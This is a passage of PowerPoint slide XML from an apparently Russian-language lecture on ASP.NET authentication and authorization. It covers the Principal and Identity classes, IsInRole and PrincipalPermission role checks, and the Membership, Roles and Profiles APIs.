              <a:t>Класс Principal включает:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>свойство I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>dentity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>которое ссылается на объект I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>dentity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>содержащий информацию о текущем пользователе.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IsInRole() – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>проверка принадлежности пользователя к некоторой роли.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Класс </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Identity d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>ключает следующие основные свойства:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>AuthenticationType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>используемый тип аутентификации в виде строкм</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> (forms, Passport,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>NTLM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>custom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>IsAuthenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>: true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> если пользователь аутентифицирован иначе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>false.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>имя текущего пользователя в виде строки.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="240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274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Проверка роли пользователя</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4997450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Все Principal объекты имеют метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>IsInRole()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>, который позволяет проверить принадлежность пользователя к группе. Этот метод принимает имя роли и возвращает true если пользовательявляется участником данной роли.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Например::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>if (User.IsInRole("Supervisors"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    // Do nothing, the page should be accessed as normal because the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    // user has administrator privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    // Don't allow this page. Instead, redirect to the home page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    Response.Redirect("default.aspx");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="200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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Использование класса PrincipalPermission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>try</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    PrincipalPermission pp = new PrincipalPermission(null,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>       @"BUILTIN\Administrators");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    pp.Demand();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    // If the code reaches this point, the demand succeeded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    // The current user is an administrator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>catch (SecurityException err)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>    // The demand failed. The current user isn't an administrator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>}</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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4924425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ASP.NET 3.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>предоставляет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>controls,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> классы и управляющие утилиты для аутентификации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>authenticating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>) пользователей с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Web forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>и затем сохранения информации пользователей в базе данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>позволяя отслеживать и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>аутентифицировать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> пользователей без использования </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Active Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> или локальной БД пользователей </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>До появления .NET Framework 2.0 аутентификация пользователей требовала создания многих сложных компонент:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Страницы подключения (login page).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Базу данных пользователей</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Программу управления учетными записями пользователей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Программу управления паролями.</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xfrm>
            <a:off x="457200" y="2276475"/>
            <a:ext cx="8229600" cy="2447925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Управление учетными записями (членством), ролями и профилями</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Membership, Roles, and Profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="ru-RU"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z="3200" smtClean="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>для управления членством и ролями (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Membership</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t> и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4924425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Для выполнения аутентификации (проверки имен и паролей пользователей) можно использовать специальные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>Membership API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>полная система управления данными о пользователях. Помогает создавать, редактировать и удалять пользователей, а также включает возможность восстановления паролей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>Roles API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>во многих случаях авторизация выполняется на основе групп пользователей, которые называются ролями (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>К одной группе может быть отнесено много пользователей и отдельный пользователь может быть отнесен ко многим группам.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>Profiles API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>возможность хранить данные, связанные с конкретным пользователем. Для этого используются профайлы (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>user profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>) пользователей,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>которые позволяют хранить данные пользователей между сеансами их работы с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>приложением. Основное различие между профайлами пользователя и состоянием сеанса работы заключается в том, что профайлы хранятся в течении множества сеансов работы.</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ru-RU" smtClean="0"/>
              <a:t>Основные понятия</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0066FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Membership</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>членство, учетные записи зарегистрированных пользователей с описанием их идентификаторов и паролей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0066FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>группы пользователей с описанием их прав авторизации.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0066FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Profiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>профили пользователей – с описанием связанных с ними набора данных.</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611188" y="2924175"/>
            <a:ext cx="7993062" cy="1296988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
